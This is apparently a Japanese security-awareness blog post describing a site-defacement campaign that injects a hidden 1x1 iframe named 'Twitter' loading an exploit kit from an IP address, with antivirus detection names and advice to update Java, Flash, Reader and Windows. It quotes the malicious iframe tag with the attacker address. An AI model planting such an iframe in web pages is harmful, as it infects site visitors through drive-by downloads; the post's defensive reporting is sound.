サイト改ざんiframe name Twitter src http 176.31.24.102 post.php?id=
表面上表示されない不正なインラインフレームタグ(IFRAME)が、サイト内の最後尾付近に挿入されれる サイト改ざん <iframe name=Twitter ~ が継続中…
パラメータ名に”Twitter”の文字が見えるけど、Twitterはまったく無関係です。
<iframe name=Twitter scrolling=auto frameborder=no align=center height=1 width=1 src = http // 176.31.24.102 / post.php?id=[ランダム数値]></iframe>
【ウイルス検出名例】
Avira JS/iFrame.EXP.4
avast! HTML:Iframe-BMJ
Comodo TrojWare.HTML.iFrame.TWTR
Kaspersky HEUR:Trojan.Script.Generic
McAfee JS/Iframe.gen.r
Microsoft Exploit:HTML/IframeRef.DM
Avira JS/iFrame.EXP.4
avast! HTML:Iframe-BMJ
Comodo TrojWare.HTML.iFrame.TWTR
Kaspersky HEUR:Trojan.Script.Generic
McAfee JS/Iframe.gen.r
Microsoft Exploit:HTML/IframeRef.DM
この不正な<IFrame>タグによって、エクスプロイトキット (RedKit Exploit Kit 、別名で Goon Exploit Kit) が設置されてる不正なページをブラウザ内部でヒッソリ読み込まされます。
ここで下の旧バージョンに存在する危険な脆弱性を悪用してウイルスを強制的にターゲットのWindowsパソコンに送り込んで感染させる攻撃が行われます。
- Oracle Java
- Adobe Flash Player (更新方法やバージョン確認)
- Adobe Reader
- Windows Update (Silverlight & Internet Explorer など)
感染経路となる危険な脆弱性を排除する無料ウイルス対策をちゃんと実施しておけば、別に実害なく何も起こりません。
企業や個人が運営してる正規の一般サイトやブログが
悪意のある第三者にハッキングされウイルス配信サイト化
↓ ↓ ↓
困ったことに、世界中で日常的に起こってる脅威!
悪意のある第三者にハッキングされウイルス配信サイト化
↓ ↓ ↓
困ったことに、世界中で日常的に起こってる脅威!
逆に、仮にも後を追うセキュリティソフトの導入でもってウイルス対策が済んでると思い込んでたら危険な地獄へ真っ逆さま!?
用語の説明
エクスプロイトキット … ブラウザ経由でターゲットのパソコンにウイルスを強制的に送り込むWebアプリケーションのこと。
サイトの閲覧でウイルス感染(ドライブバイ・ダウンロード攻撃)させる時に頻繁に利用されてる。
脆弱性(ぜいじゃくせい) … セキュリティの侵害を起こす欠陥のこと。
最新バージョンでは脆弱性が修正されていくものの、ユーザーが更新作業を行わず旧バージョンのまま放置してることがウイルス感染する大きな原因になってる。
最新バージョンでは脆弱性が修正されていくものの、ユーザーが更新作業を行わず旧バージョンのまま放置してることがウイルス感染する大きな原因になってる。